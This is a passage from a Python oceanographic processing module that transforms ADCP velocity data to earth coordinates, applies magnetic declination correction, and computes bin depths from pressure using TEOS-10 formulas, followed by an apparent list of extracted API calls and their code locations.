cos_P = np.cos(Prad)
sin_P = np.sin(Prad)
# determine array size
n_packets = u.shape[0]
n_uvw = u.shape[1]
# initialize vectors to be used as matrix elements
ones = np.ones(n_packets)
zeros = ones * 0.0
# the rollaxis calls reorient the matrices so that their lead index is
# the data packet index
M1 = np.array([[cos_H, sin_H, zeros],
[-sin_H, cos_H, zeros],
[zeros, zeros, ones]])
M1 = np.rollaxis(M1, 2)
M2 = np.array([[ones, zeros, zeros],
[zeros, cos_P, -sin_P],
[zeros, sin_P, cos_P]])
M2 = np.rollaxis(M2, 2)
M3 = np.array([[cos_R, zeros, sin_R],
[zeros, ones, zeros],
[-sin_R, zeros, cos_R]])
M3 = np.rollaxis(M3, 2)
# construct input array of coordinates (velocities) to be transformed.
# the basis set is 3D (E,N,U) so that the middle dimension is sized at 3.
uvw = np.zeros((n_packets, 3, n_uvw))
# pack the coordinates (velocities) to be transformed into the appropriate
# slices.
uvw[:, 0, :] = u
uvw[:, 1, :] = v
uvw[:, 2, :] = w
# the Einstein summation is here configured to do the matrix
# multiplication MM(i,l) = M1(i,j) * M2(j,k) * M3(k,l) on each slice h.
MM = np.einsum('hij,hjk,hkl->hil', M1, M2, M3)
# the Einstein summation is here configured to do the matrix
# multiplication uvw_earth(i,m) = MM(i,l) * uvw(l,m) on each slice h.
uvw_earth = np.einsum('hil,hlm->him', MM, uvw)
# NOTE:
# these last two executable statements run about a factor of 2
# faster in the 10000 data packet performance tests versus combining
# these operations into the one statement:
# uvw_earth = np.einsum('hij,hjk,hkl,hlm->him', M1, M2, M3, uvw)
# break out the coordinate slices and return them
uu = uvw_earth[:, 0, :]
vv = uvw_earth[:, 1, :]
ww = uvw_earth[:, 2, :]
return (uu, vv, ww)
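# Editor's sketch (not part of the original module): with zero pitch, zero
# roll and a downward-looking orientation, the transform above reduces to the
# heading rotation M1, so a pure instrument-x velocity under a 90-degree
# heading maps to (0, -1, 0) in earth coordinates.
def _example_adcp_ins2earth():
    import numpy as np
    u, v, w = np.array([[1.0]]), np.array([[0.0]]), np.array([[0.0]])
    heading = np.array([9000])  # 90.00 degrees, in centidegrees
    zero = np.array([0])
    uu, vv, ww = adcp_ins2earth(u, v, w, heading, zero, zero, zero)
    assert np.allclose(uu, 0.0) and np.allclose(vv, -1.0) and np.allclose(ww, 0.0)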
def magnetic_correction(theta, u, v):
"""
Description:
This function corrects velocity profiles for the magnetic variation
(declination) at the measurement location. The magnetic declination
is obtained from the 2010 World Magnetic Model (WMM2010) provided by
NOAA (see wmm_declination).
This version handles 'vectorized' input variables without using for
loops. It was specifically written to handle the case of a 1D array of
theta values, theta=f(i), with corresponding sets of 'u' and 'v' values
such that u=f(i,j) and v=f(i,j), where there are j 'u' and 'v' values
for each theta(i).
Implemented by:
2014-04-04: <NAME>. Initial code. This function is used to
calculate magnetic corrections by the functions contained
in this module instead of the function magnetic_correction
found in ion_functions.data.generic_functions.
2015-04-10: Russell Desiderio. Corrected a typo:
uv = np.atleast_2d(u) -> u = np.atleast_2d(u)
Usage:
u_cor, v_cor = magnetic_correction(theta, u, v)
where
u_cor = eastward velocity profiles, in earth coordinates, with
the correction for magnetic variation applied.
v_cor = northward velocity profiles, in earth coordinates,
with the correction for magnetic variation applied.
theta = magnetic variation based on location (latitude, longitude and
altitude) and date; units of theta are [degrees]
u = uncorrected eastward velocity profiles in earth coordinates
v = uncorrected northward velocity profiles in earth coordinates
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00750_Data_Product_SPEC_VELPROF_OOI.pdf)
OOI (2013). Data Product Specification for Turbulent Velocity Profile
and Echo Intensity. Document Control Number 1341-00760.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00760_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
# force shapes of inputs to arrays
theta = np.atleast_1d(theta)
u = np.atleast_2d(u)
v = np.atleast_2d(v)
theta_rad = np.radians(theta)
cosT = np.cos(theta_rad)
sinT = np.sin(theta_rad)
M = np.array([[cosT, sinT],
[-sinT, cosT]])
# roll axes so that the lead index represents data packet #.
M = np.rollaxis(M, 2)
# the coordinate system is 2D, so the middle dimension is sized at 2.
uv = np.zeros((u.shape[0], 2, u.shape[1]))
# pack the coordinates to be rotated into the appropriate slices
uv[:, 0, :] = u
uv[:, 1, :] = v
# the Einstein summation is here configured to do the matrix
# multiplication uv_cor(i,k) = M(i,j) * uv(j,k) on each slice h.
uv_cor = np.einsum('hij,hjk->hik', M, uv)
# the magnetically corrected u values are:
u_cor = uv_cor[:, 0, :]
# the magnetically corrected v values are:
v_cor = uv_cor[:, 1, :]
# return corrected u and v values
return (u_cor, v_cor)
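# Editor's sketch (not part of the original module): with an (exaggerated)
# 90-degree east declination, a flow toward magnetic north is rotated into a
# flow toward true east by the matrix rotation above.
def _example_magnetic_correction():
    import numpy as np
    theta = np.array([90.0])  # declination [degrees]
    u = np.array([[0.0]])    # magnetic-east component
    v = np.array([[1.0]])    # magnetic-north component
    u_cor, v_cor = magnetic_correction(theta, u, v)
    assert np.allclose(u_cor, 1.0) and np.allclose(v_cor, 0.0)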
def adcp_bin_depths_bar(dist_first_bin, bin_size, num_bins, pressure, adcp_orientation, latitude):
"""
Description:
Calculates the center bin depths for PD0 and PD12 ADCP data. As defined
in the Data Product Specification for Velocity Profile and Echo
Intensity - DCN 1341-00750.
Implemented by:
2015-01-29: <NAME>. Initial code.
2015-06-26: <NAME>. Fixed the handling of the pressure variables.
Time-vectorized the code by finessing the conditional.
2015-06-30: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
bin_depths = adcp_bin_depths_bar(dist_first_bin, bin_size, num_bins, pressure,
adcp_orientation, latitude)
where
bin_depths = [meters]
dist_first_bin = distance to the first ADCP bin [centimeters]
bin_size = depth of each ADCP bin [centimeters]
num_bins = number of ADCP bins [unitless]
pressure = pressure at the sensor head [bar]
adcp_orientation = 1=upward looking or 0=downward looking [unitless]
latitude = latitude of the instrument [degrees]
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00750_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
# check for CI fill values.
pressure = replace_fill_with_nan(None, pressure)
# Convert pressure from bar to decibar
pressure_dbar = pressure * 10.0
# Calculate sensor depth using TEOS-10 toolbox z_from_p function
# note change of sign to make the sensor_depth variable positive
sensor_depth = -z_from_p(pressure_dbar, latitude)
return adcp_bin_depths_meters(dist_first_bin, bin_size, num_bins, sensor_depth, adcp_orientation)
def adcp_bin_depths_dapa(dist_first_bin, bin_size, num_bins, pressure, adcp_orientation, latitude):
"""
Description:
Calculates the center bin depths for PD0 and PD12 ADCP data. As defined
in the Data Product Specification for Velocity Profile and Echo
Intensity - DCN 1341-00750.
Implemented by:
2015-01-29: <NAME>. Initial code.
2015-06-26: <NAME>. Fixed the handling of the pressure variables.
Time-vectorized the code by finessing the conditional.
2015-06-30: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
bin_depths = adcp_bin_depths_dapa(dist_first_bin, bin_size, num_bins, pressure,
adcp_orientation, latitude)
where
bin_depths = [meters]
dist_first_bin = distance to the first ADCP bin [centimeters]
bin_size = depth of each ADCP bin [centimeters]
num_bins = number of ADCP bins [unitless]
pressure = pressure at the sensor head [daPa]
adcp_orientation = 1=upward looking or 0=downward looking [unitless]
latitude = latitude of the instrument [degrees]
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00750_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
# check for CI fill values.
pressure = replace_fill_with_nan(None, pressure)
# Convert pressure from decaPascal to decibar
pressure_dbar = pressure / 1000.0
# Calculate sensor depth using TEOS-10 toolbox z_from_p function
# note change of sign to make the sensor_depth variable positive
sensor_depth = -z_from_p(pressure_dbar, latitude)
return adcp_bin_depths_meters(dist_first_bin, bin_size, num_bins, sensor_depth, adcp_orientation)
def z_from_p(p, lat, geo_strf_dyn_height=0, sea_surface_geopotential=0):
"""Calculates height from sea pressure using the computationally-efficient
75-term expression for density in terms of SA, CT and p (Roquet et al.,
2015). Dynamic height anomaly, geo_strf_dyn_height, if provided, must be
computed with its p_ref=0 (the surface). Also if provided, sea_surface_geopotential
is the geopotential at zero sea pressure.
Calls a function which calculates enthalpy assuming standard ocean salinity
and 0 degrees Celsius.
Parameters
----------
p : pressure [dbar]
lat : latitude in decimal degrees north [-90..+90]
geo_strf_dyn_height : dynamic height anomaly [m^2/s^2]
sea_surface_geopotential : geopotential at zero sea pressure [ m^2/s^2 ]
Returns
-------
z : TEOS-10 height [m] : height is returned as a negative number; its
absolute value is the depth below the sea surface.
#################################################################
# Check values from TEOS-10 version 3.05 (matlab code): #
# from http://www.teos-10.org/pubs/gsw/html/gsw_z_from_p.html #
#################################################################
p = [10, 50, 125, 250, 600, 1000]
lat = 4
z_from_p(p, lat) =
[ -9.9445834469453, -49.7180897012550, -124.2726219409978,
-248.4700576548589, -595.8253480356214, -992.0919060719987]
Notes
-----
At sea level z = 0, and since z (HEIGHT) is defined to be positive upwards,
it follows that while z is positive in the atmosphere, it is NEGATIVE in
the ocean.
References
----------
IOC, SCOR and IAPSO, 2010: The international thermodynamic equation of
seawater - 2010: Calculation and use of thermodynamic properties.
Intergovernmental Oceanographic Commission, Manuals and Guides No. 56,
UNESCO (English), 196 pp. Available from the TEOS-10 web site.
<NAME>., <NAME>, <NAME> and <NAME>, 2003:
Accurate and computationally efficient algorithms for potential
temperature and density of seawater. J. Atmosph. Ocean. Tech., 20,
pp. 730-741.
Moritz, 2000: Geodetic reference system 1980. J. Geodesy, 74, 128-133.
<NAME>., <NAME>, <NAME>, <NAME>, 2015: Accurate
polynomial expressions for the density and specific volume of seawater
using the TEOS-10 standard. Ocean Modelling.
<NAME>., 1981: Practical conversion of pressure to depth.
Journal of Physical Oceanography, 11, 573-574.
IMPLEMENTATION NOTES:
<NAME>. 2015_07_01
versions 3.04 and 3.05 of the main function z_from_p are identical.
z_from_p calls the subroutine enthalpy_SSO_0_p; this subroutine
has been updated from ver 3.04 to 3.05.
the check values above for z_from_p have been updated to incorporate
this change using enthalpy_SSO_0_p ver 3.05.
"""
X = np.sin(np.deg2rad(lat))
sin2 = X ** 2
B = 9.780327 * (1.0 + (5.2792e-3 + (2.32e-5 * sin2)) * sin2)
gamma = 2.26e-07
A = -0.5 * gamma * B
C = enthalpy_SSO_0_p(p) - geo_strf_dyn_height
return -2 * C / (B + np.sqrt(B ** 2 - 4 * A * C))
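# Editor's sketch (not part of the original module): reproducing the TEOS-10
# v3.05 check values quoted in the docstring above.
def _example_z_from_p():
    import numpy as np
    p = np.array([10.0, 50.0, 125.0, 250.0, 600.0, 1000.0])  # [dbar]
    z = z_from_p(p, 4.0)
    assert np.allclose(z, [-9.9445834469453, -49.7180897012550,
                        -124.2726219409978, -248.4700576548589,
                        -595.8253480356214, -992.0919060719987])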
def enthalpy_SSO_0_p(p):
"""
This documentation and code were copied from the Matlab coding of this function.
%==========================================================================
% This function calculates enthalpy at the Standard Ocean Salinity, SSO,
% and at a Conservative Temperature of zero degrees C, as a function of
% pressure, p, in dbar, using a streamlined version of the 76-term
% computationally-efficient expression for specific volume, that is, a
% streamlined version of the code "gsw_enthalpy(SA,CT,p)".
%
% VERSION NUMBER: 3.05 (27th January 2015)
%
% REFERENCES:
% <NAME>., <NAME>, <NAME>, <NAME>, 2015: Accurate
% polynomial expressions for the density and specific volume of seawater
% using the TEOS-10 standard. Ocean Modelling.
%
%==========================================================================
IMPLEMENTATION NOTES:
<NAME>. 2015_07_01. this subroutine has been updated
from ver 3.04 to 3.05.
"""
z = p * 1e-4
h006 = -2.1078768810e-9
h007 = 2.8019291329e-10
dynamic_enthalpy_SSO_0_p = z * (9.726613854843870e-4 + z * (-2.252956605630465e-5 + z * (
2.376909655387404e-6 + z * (-1.664294869986011e-7 + z * (
-5.988108894465758e-9 + z * (h006 + h007 * z))))))
enthalpy_SSO_0 = dynamic_enthalpy_SSO_0_p * 1.e8 # Note. 1e8 = db2Pa*1e4
return enthalpy_SSO_0
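# Editor's sketch (not part of the original module): at zero sea pressure the
# polynomial above gives exactly zero, and at 10 dbar it is roughly g * depth
# (~97.3 m^2 s-2), which is the quantity z_from_p inverts.
def _example_enthalpy_SSO_0_p():
    assert enthalpy_SSO_0_p(0.0) == 0.0
    assert abs(enthalpy_SSO_0_p(10.0) - 97.26) < 0.05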
def adcp_bin_depths_meters(dist_first_bin, bin_size, num_bins, sensor_depth, adcp_orientation):
"""
Description:
Calculates the center bin depths for PD0, PD8 and PD12 ADCP data. As defined
in the Data Product Specification for Velocity Profile and Echo
Intensity - DCN 1341-00750.
Implemented by:
2015-01-30: <NAME>. Initial code.
2015-06-26: <NAME>. Time-vectorized the code by finessing the conditionals.
2015-06-30: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
bin_depths_pd8 = adcp_bin_depths_meters(dist_first_bin, bin_size, num_bins, sensor_depth,
adcp_orientation)
where
bin_depths_pd8 = [meters]
dist_first_bin = distance to the first ADCP bin [centimeters]
bin_size = depth of each ADCP bin [centimeters]
num_bins = number of ADCP bins [unitless]
sensor_depth = estimated depth at the sensor head [meters]
adcp_orientation = 1=upward looking or 0=downward looking [unitless]
Notes:
The PD8 output format is a very sparse format. Other than num_bins, it does *not* record
any of the other input variables required by this DPA. Those must somehow be supplied "by
hand".
"""
# check for CI fill values.
#
# Note that these input parameters will not come from an IDD driver (except possibly
# num_bins) because the PD8 output format does not output them. Therefore, I don't know
# if they will be of type integer or not. However, ndarrays composed of float types are
# passed through the check-code unchanged, so run the inputs through in case they are of
# type int and in case -999999999 fill values are somehow present.
dist_first_bin, bin_size, num_bins, sensor_depth, adcp_orientation = replace_fill_with_nan(
None, dist_first_bin, bin_size, num_bins, sensor_depth, adcp_orientation)
# note, there is a CI problem not yet addressed if the time-vectorized values
# in num_bins are not all the same!! For now, assume they are all the same:
num_bins_constant = num_bins[0]
# make bin_numbers a row vector
bin_numbers = np.array([np.arange(num_bins_constant)])
# Convert from cm to meters
# the input variables are type integer, so divide by a real number
# to avoid truncation errors.
dist_first_bin = dist_first_bin / 100.0
bin_size = bin_size / 100.0
# make sure sensor depth is positive
sensor_depth = np.fabs(sensor_depth)
# Following the PD0 convention where
# adcp_orientation = 0 is downward looking, bindepths are added to sensor depth
# = 1 is upward looking, bindepths are subtracted from sensor depth
z_sign = 1.0 - 2.0 * adcp_orientation
# to broadcast the vertical time dimension correctly with the horizontal bin_numbers dimension,
# make all the 1D time arrays into column vectors to be processed with the bin_numbers row vector.
sensor_depth = sensor_depth.reshape(-1, 1)
z_sign = z_sign.reshape(-1, 1)
dist_first_bin = dist_first_bin.reshape(-1, 1)
bin_size = bin_size.reshape(-1, 1)
# Calculate bin depths
bin_depths_pd8 = sensor_depth + z_sign * (dist_first_bin + bin_size * bin_numbers)
return bin_depths_pd8
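# Editor's sketch (not part of the original module): an upward-looking ADCP at
# 100 m depth, with the first 2 m bin centered 5 m above the transducer, so
# the three bin depths step upward away from the sensor.
def _example_adcp_bin_depths_meters():
    import numpy as np
    depths = adcp_bin_depths_meters(
        np.array([500]),    # distance to first bin [cm]
        np.array([200]),    # bin size [cm]
        np.array([3]),      # number of bins
        np.array([100.0]),  # sensor depth [m]
        np.array([1]))      # 1 = upward looking
    assert np.allclose(depths, [[95.0, 93.0, 91.0]])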
|
[
"numpy.radians",
"ion_functions.data.generic_functions.magnetic_declination",
"ion_functions.data.generic_functions.replace_fill_with_nan",
"numpy.isscalar",
"numpy.deg2rad",
"numpy.zeros",
"numpy.ones",
"numpy.einsum",
"numpy.sin",
"numpy.array",
"numpy.fabs",
"numpy.cos",
"numpy.rollaxis",
"numpy.tan",
"numpy.arange",
"numpy.atleast_1d",
"numpy.sqrt",
"numpy.atleast_2d"
] |
[((5640, 5658), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (5653, 5658), True, 'import numpy as np\n'), ((5670, 5688), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (5683, 5688), True, 'import numpy as np\n'), ((5699, 5716), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (5712, 5716), True, 'import numpy as np\n'), ((6005, 6039), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (6025, 6039), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((8971, 8989), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (8984, 8989), True, 'import numpy as np\n'), ((9001, 9019), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (9014, 9019), True, 'import numpy as np\n'), ((9030, 9047), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (9043, 9047), True, 'import numpy as np\n'), ((9318, 9352), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (9338, 9352), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((15110, 15126), 'numpy.atleast_2d', 'np.atleast_2d', (['u'], {}), '(u)\n', (15123, 15126), True, 'import numpy as np\n'), ((15136, 15152), 'numpy.atleast_2d', 'np.atleast_2d', (['v'], {}), '(v)\n', (15149, 15152), True, 'import numpy as np\n'), ((15225, 15268), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'u', 'v'], {}), '(ADCP_FILLVALUE, u, v)\n', (15246, 15268), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((15428, 15446), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (15441, 15446), True, 'import numpy as np\n'), ((15458, 15476), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (15471, 15476), True, 'import numpy as np\n'), ((15487, 15504), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (15500, 15504), True, 'import numpy as np\n'), ((15567, 15601), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (15587, 15601), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((17653, 17669), 'numpy.atleast_2d', 'np.atleast_2d', (['u'], {}), '(u)\n', (17666, 17669), True, 'import numpy as np\n'), ((17679, 17695), 'numpy.atleast_2d', 'np.atleast_2d', (['v'], {}), '(v)\n', (17692, 17695), True, 'import numpy as np\n'), ((17768, 17811), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'u', 'v'], {}), '(ADCP_FILLVALUE, u, v)\n', (17789, 17811), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((17971, 17989), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (17984, 17989), True, 'import numpy as np\n'), ((18001, 18019), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (18014, 18019), True, 'import numpy as np\n'), ((18030, 18047), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (18043, 18047), True, 'import numpy as np\n'), ((18110, 18144), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (18130, 18144), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((19094, 19134), 
'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'w'], {}), '(ADCP_FILLVALUE, w)\n', (19115, 19134), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((19990, 20030), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'e'], {}), '(ADCP_FILLVALUE, e)\n', (20011, 20030), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((22378, 22396), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (22391, 22396), True, 'import numpy as np\n'), ((22408, 22426), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (22421, 22426), True, 'import numpy as np\n'), ((22437, 22454), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (22450, 22454), True, 'import numpy as np\n'), ((22725, 22759), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (22745, 22759), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((25110, 25128), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (25123, 25128), True, 'import numpy as np\n'), ((25140, 25158), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (25153, 25158), True, 'import numpy as np\n'), ((25169, 25186), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (25182, 25186), True, 'import numpy as np\n'), ((25457, 25491), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (25477, 25491), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((29955, 29996), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'b5'], {}), '(ADCP_FILLVALUE, b5)\n', (29976, 29996), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((33163, 33195), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['None', 'raw'], {}), '(None, raw)\n', (33184, 33195), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((34790, 34807), 'numpy.atleast_2d', 'np.atleast_2d', (['b1'], {}), '(b1)\n', (34803, 34807), True, 'import numpy as np\n'), ((34818, 34835), 'numpy.atleast_2d', 'np.atleast_2d', (['b2'], {}), '(b2)\n', (34831, 34835), True, 'import numpy as np\n'), ((34846, 34863), 'numpy.atleast_2d', 'np.atleast_2d', (['b3'], {}), '(b3)\n', (34859, 34863), True, 'import numpy as np\n'), ((34874, 34891), 'numpy.atleast_2d', 'np.atleast_2d', (['b4'], {}), '(b4)\n', (34887, 34891), True, 'import numpy as np\n'), ((34916, 34969), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'b1', 'b2', 'b3', 'b4'], {}), '(ADCP_FILLVALUE, b1, b2, b3, b4)\n', (34937, 34969), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((38103, 38162), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['None', 'heading', 'pitch', 'roll', 'vertical'], {}), '(None, heading, pitch, roll, vertical)\n', (38124, 38162), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((38520, 38533), 'numpy.radians', 'np.radians', (['R'], {}), '(R)\n', (38530, 38533), True, 'import numpy as np\n'), ((38547, 38559), 'numpy.cos', 'np.cos', (['Rrad'], {}), '(Rrad)\n', (38553, 
38559), True, 'import numpy as np\n'), ((38573, 38585), 'numpy.sin', 'np.sin', (['Rrad'], {}), '(Rrad)\n', (38579, 38585), True, 'import numpy as np\n'), ((38613, 38632), 'numpy.radians', 'np.radians', (['heading'], {}), '(heading)\n', (38623, 38632), True, 'import numpy as np\n'), ((38646, 38658), 'numpy.cos', 'np.cos', (['Hrad'], {}), '(Hrad)\n', (38652, 38658), True, 'import numpy as np\n'), ((38672, 38684), 'numpy.sin', 'np.sin', (['Hrad'], {}), '(Hrad)\n', (38678, 38684), True, 'import numpy as np\n'), ((38711, 38728), 'numpy.radians', 'np.radians', (['pitch'], {}), '(pitch)\n', (38721, 38728), True, 'import numpy as np\n'), ((38742, 38758), 'numpy.radians', 'np.radians', (['roll'], {}), '(roll)\n', (38752, 38758), True, 'import numpy as np\n'), ((38825, 38837), 'numpy.cos', 'np.cos', (['Prad'], {}), '(Prad)\n', (38831, 38837), True, 'import numpy as np\n'), ((38851, 38863), 'numpy.sin', 'np.sin', (['Prad'], {}), '(Prad)\n', (38857, 38863), True, 'import numpy as np\n'), ((39016, 39034), 'numpy.ones', 'np.ones', (['n_packets'], {}), '(n_packets)\n', (39023, 39034), True, 'import numpy as np\n'), ((39176, 39255), 'numpy.array', 'np.array', (['[[cos_H, sin_H, zeros], [-sin_H, cos_H, zeros], [zeros, zeros, ones]]'], {}), '([[cos_H, sin_H, zeros], [-sin_H, cos_H, zeros], [zeros, zeros, ones]])\n', (39184, 39255), True, 'import numpy as np\n'), ((39306, 39324), 'numpy.rollaxis', 'np.rollaxis', (['M1', '(2)'], {}), '(M1, 2)\n', (39317, 39324), True, 'import numpy as np\n'), ((39335, 39414), 'numpy.array', 'np.array', (['[[ones, zeros, zeros], [zeros, cos_P, -sin_P], [zeros, sin_P, cos_P]]'], {}), '([[ones, zeros, zeros], [zeros, cos_P, -sin_P], [zeros, sin_P, cos_P]])\n', (39343, 39414), True, 'import numpy as np\n'), ((39465, 39483), 'numpy.rollaxis', 'np.rollaxis', (['M2', '(2)'], {}), '(M2, 2)\n', (39476, 39483), True, 'import numpy as np\n'), ((39494, 39573), 'numpy.array', 'np.array', (['[[cos_R, zeros, sin_R], [zeros, ones, zeros], [-sin_R, zeros, cos_R]]'], {}), '([[cos_R, zeros, sin_R], [zeros, ones, zeros], [-sin_R, zeros, cos_R]])\n', (39502, 39573), True, 'import numpy as np\n'), ((39624, 39642), 'numpy.rollaxis', 'np.rollaxis', (['M3', '(2)'], {}), '(M3, 2)\n', (39635, 39642), True, 'import numpy as np\n'), ((39811, 39842), 'numpy.zeros', 'np.zeros', (['(n_packets, 3, n_uvw)'], {}), '((n_packets, 3, n_uvw))\n', (39819, 39842), True, 'import numpy as np\n'), ((40161, 40202), 'numpy.einsum', 'np.einsum', (['"""hij,hjk,hkl->hil"""', 'M1', 'M2', 'M3'], {}), "('hij,hjk,hkl->hil', M1, M2, M3)\n", (40170, 40202), True, 'import numpy as np\n'), ((40363, 40397), 'numpy.einsum', 'np.einsum', (['"""hil,hlm->him"""', 'MM', 'uvw'], {}), "('hil,hlm->him', MM, uvw)\n", (40372, 40397), True, 'import numpy as np\n'), ((43386, 43406), 'numpy.atleast_1d', 'np.atleast_1d', (['theta'], {}), '(theta)\n', (43399, 43406), True, 'import numpy as np\n'), ((43416, 43432), 'numpy.atleast_2d', 'np.atleast_2d', (['u'], {}), '(u)\n', (43429, 43432), True, 'import numpy as np\n'), ((43442, 43458), 'numpy.atleast_2d', 'np.atleast_2d', (['v'], {}), '(v)\n', (43455, 43458), True, 'import numpy as np\n'), ((43478, 43495), 'numpy.radians', 'np.radians', (['theta'], {}), '(theta)\n', (43488, 43495), True, 'import numpy as np\n'), ((43508, 43525), 'numpy.cos', 'np.cos', (['theta_rad'], {}), '(theta_rad)\n', (43514, 43525), True, 'import numpy as np\n'), ((43538, 43555), 'numpy.sin', 'np.sin', (['theta_rad'], {}), '(theta_rad)\n', (43544, 43555), True, 'import numpy as np\n'), ((43567, 43606), 'numpy.array', 
'np.array', (['[[cosT, sinT], [-sinT, cosT]]'], {}), '([[cosT, sinT], [-sinT, cosT]])\n', (43575, 43606), True, 'import numpy as np\n'), ((43703, 43720), 'numpy.rollaxis', 'np.rollaxis', (['M', '(2)'], {}), '(M, 2)\n', (43714, 43720), True, 'import numpy as np\n'), ((43808, 43845), 'numpy.zeros', 'np.zeros', (['(u.shape[0], 2, u.shape[1])'], {}), '((u.shape[0], 2, u.shape[1]))\n', (43816, 43845), True, 'import numpy as np\n'), ((44112, 44144), 'numpy.einsum', 'np.einsum', (['"""hij,hjk->hik"""', 'M', 'uv'], {}), "('hij,hjk->hik', M, uv)\n", (44121, 44144), True, 'import numpy as np\n'), ((45996, 46033), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['None', 'pressure'], {}), '(None, pressure)\n', (46017, 46033), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((48046, 48083), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['None', 'pressure'], {}), '(None, pressure)\n', (48067, 48083), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((55207, 55306), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['None', 'dist_first_bin', 'bin_size', 'num_bins', 'sensor_depth', 'adcp_orientation'], {}), '(None, dist_first_bin, bin_size, num_bins,\n sensor_depth, adcp_orientation)\n', (55228, 55306), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((55897, 55918), 'numpy.fabs', 'np.fabs', (['sensor_depth'], {}), '(sensor_depth)\n', (55904, 55918), True, 'import numpy as np\n'), ((33007, 33027), 'numpy.isscalar', 'np.isscalar', (['sfactor'], {}), '(sfactor)\n', (33018, 33027), True, 'import numpy as np\n'), ((35158, 35170), 'numpy.sqrt', 'np.sqrt', (['(2.0)'], {}), '(2.0)\n', (35165, 35170), True, 'import numpy as np\n'), ((51534, 51549), 'numpy.deg2rad', 'np.deg2rad', (['lat'], {}), '(lat)\n', (51544, 51549), True, 'import numpy as np\n'), ((35028, 35041), 